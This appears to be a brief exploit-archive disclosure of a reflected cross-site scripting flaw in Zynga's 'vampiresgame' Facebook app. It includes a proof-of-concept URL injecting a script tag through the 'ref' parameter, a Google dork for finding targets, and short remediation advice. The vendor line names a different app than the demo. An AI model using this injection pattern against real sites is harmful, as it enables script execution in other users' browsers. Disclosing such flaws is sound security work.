_______  ________________ __    _____________
_______ \   _  \ \   _  \______  \  | _/_   \______  \         __  _  __
\_  __ \/  /_\  \/  /_\  \  /    /  |/ /|   |   /    /  ______ \ \/ \/ /
 |  | \/\  \_/   \  \_/   \/    /|    < |   |  /    /  /_____/  \     /
 |__|    \_____  /\_____  /____/ |__|_ \|___| /____/             \/\_/
               \/       \/            \/


-------------------------------------------------------------------------------------------------------------------------------------------------

   TITLE: Reflected XSS bug in ZYNGA vampiresgame(facebook apps)
   vendor: www.apps.facebook.com/petvillegame/**[]
<http://www.apps.facebook.com/petvillegame/**%5B%5D>
  Author: r007k17-w a.k.a Raghavendra Karthik.D
  Email:  n4gb07@gmail.com
  My blog: http://shadowrootkit.wordpress.com/
  Google Dork: Copyright 2010 Zynga Game Network Inc
-------------------------------------------------------------------------------------------------------------------------------------------------------------

DEMO: http://apps.facebook.com/vampiresgame/index.php?ref="><script>alert("r007k17-w")</script>
SUG: HTML encoding, escaping special characters,Input sanitization.
-------------------------------------------------------------------------------------------------------------------------------------------------------------
gr33t1ngs to s1d3-3ff3cts,3psilonlambda and all my friends